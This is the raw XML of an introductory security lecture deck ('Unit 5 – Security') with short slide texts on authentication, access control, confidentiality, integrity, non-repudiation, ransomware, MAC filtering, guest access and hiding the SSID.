          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Google Shape;433;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2250675" y="2700350"/>
            <a:ext cx="579300" cy="41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6"/>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29</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647000" y="1851750"/>
            <a:ext cx="41040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Control access with MAC address</a:t>
            </a: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441" name="Google Shape;441;p46"/>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MAC Filtering</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="442" name="Google Shape;442;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1416650" y="2578050"/>
            <a:ext cx="6553200" cy="320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a:t>IEEE 7492/2 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2204839"/>
            <a:ext cx="8596800" cy="3880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ca-ES"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p20"/>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a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p20"/>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Authentication</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="169" name="Google Shape;169;p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236609" y="3820500"/>
            <a:ext cx="2613066" cy="2801458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="170" name="Google Shape;170;p2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36609" y="2077400"/>
            <a:ext cx="2613064" cy="1838586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="171" name="Google Shape;171;p2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177225" y="111900"/>
            <a:ext cx="2752799" cy="2048700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951795" y="1851750"/>
            <a:ext cx="2010900" cy="1272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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Two Factors</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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Multifactor</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="173" name="Google Shape;173;p20"/>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3564159" y="1469425"/>
            <a:ext cx="2613066" cy="1426872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="174" name="Google Shape;174;p20"/>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743200" y="4217881"/>
            <a:ext cx="3493400" cy="1978138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175" name="Google Shape;175;p20"/>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215223" y="2758748"/>
            <a:ext cx="4023942" cy="1799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30</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="Google Shape;449;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647000" y="1851750"/>
            <a:ext cx="52764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To avoid to give access to your private network</a:t>
            </a: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450" name="Google Shape;450;p47"/>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Guest Access</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="451" name="Google Shape;451;p4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68950" y="2313975"/>
            <a:ext cx="6001805" cy="42671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8"/>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31</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647000" y="1851750"/>
            <a:ext cx="52764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If it is not shown, no one will ask.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="just"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459" name="Google Shape;459;p48"/>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Hide SSID</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="460" name="Google Shape;460;p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19050" y="2462525"/>
            <a:ext cx="6371629" cy="4035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9"/>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Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>To finish....</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Google Shape;466;p49"/>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32</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Google Shape;467;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3343275" y="3493462"/>
            <a:ext cx="5688300" cy="101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6000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="AB7D20"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>Thanks!</a:t>
            </a:r>
            <a:endParaRPr sz="6000" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="AB7D20"/>
              </a:solidFill>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4</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p21"/>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Access control</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951802" y="1851750"/>
            <a:ext cx="2712000" cy="1272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Identified users</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="184" name="Google Shape;184;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3816202" y="1621825"/>
            <a:ext cx="5895975" cy="3057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5</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Google Shape;191;p22"/>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Confidentiality</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951802" y="1851750"/>
            <a:ext cx="2712000" cy="1272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D9A337"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not understandable or not accessible</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pic>
        <p:nvPicPr>
          <p:cNvPr id="193" name="Google Shape;193;p2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727492" y="2183361"/>
            <a:ext cx="5745365" cy="3248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6</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Google Shape;200;p23"/>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Integrity </a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Google Shape;201;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="5299200" cy="12726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If part or all of a transaction is exposed, modified or altered in any way, the integrity is damaged</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202" name="Google Shape;202;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5069825" y="5525800"/>
            <a:ext cx="667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03" name="Google Shape;203;p23">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4442750" y="3620225"/>
            <a:ext cx="3048000" cy="171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7</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p24"/>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Non repudiation</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="52992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System ability to disallow authorship denial</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="D9A337"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Third parties</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="D9A337"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Signature </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212" name="Google Shape;212;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5069825" y="5525800"/>
            <a:ext cx="667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13" name="Google Shape;213;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4285550" y="2851500"/>
            <a:ext cx="3440450" cy="252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738534" y="1851750"/>
            <a:ext cx="2613066" cy="3481910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="220" name="Google Shape;220;p2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73747" y="2301325"/>
            <a:ext cx="6264774" cy="3523925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="221" name="Google Shape;221;p2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81398" y="5234248"/>
            <a:ext cx="7547234" cy="1464900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Google Shape;222;p25"/>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ca-ES"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="223" name="Google Shape;223;p25"/>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481398" y="4692063"/>
            <a:ext cx="3500050" cy="571250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460062" y="6366128"/>
            <a:ext cx="4743900" cy="144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25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4378225" y="609600"/>
            <a:ext cx="4667250" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="226" name="Google Shape;226;p25"/>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9097925" y="609600"/>
            <a:ext cx="3094075" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Google Shape;227;p2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ca-ES"/>
              <a:t>Dark techniques</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Google Shape;228;p25"/>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Computer Intrusion</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Google Shape;229;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="52992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Exploit</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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8590663" y="6041362"/>
            <a:ext cx="6834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ca-ES"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677300" y="1317925"/>
            <a:ext cx="8712300" cy="15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ca-ES" sz="2400"/>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;237;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="6137700" cy="6657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D9A337"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Appropriation of an account and ransom requested </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5069825" y="5525800"/>
            <a:ext cx="667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39" name="Google Shape;239;p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883475" y="2753900"/>
            <a:ext cx="5636200" cy="3381720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Faceta">
  <a:themeElements>
    <a:clrScheme name="Personalizado 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="454551"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D8D9DC"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="D9A337"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E9ABEB"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="33333C"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="4775E7"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="8971E1"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="D54773"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="FFC000"/>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895</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>228</Paragraphs>
  <Slides>32</Slides>
  <Notes>32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Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Lustria</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Faceta</vt:lpstr>
      <vt:lpstr>uNit 5 – Security    </vt:lpstr>
      <vt:lpstr>Index</vt:lpstr>
      <vt:lpstr>IEEE 7492/2 </vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Dark techniques</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Malware</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Antivirus</vt:lpstr>
      <vt:lpstr>Firewall</vt:lpstr>
      <vt:lpstr>Wireless (WEP,WPA,WPA-PSK WPA2-PSK)  </vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Good Practices</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>To finish....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 Security    </dc:title>
  <dc:creator>Juan Bautista Talens Felis</dc:creator>
  <cp:lastModifiedBy>TALENS FELIS, JUAN BAUTISTA</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-19T20:31:03Z</dcterms:modified>
</cp:coreProperties>
</file>